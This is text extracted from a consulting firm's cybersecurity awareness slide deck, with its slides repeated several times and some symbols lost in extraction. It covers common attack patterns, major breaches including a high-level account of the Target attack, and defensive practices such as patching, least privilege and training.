THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
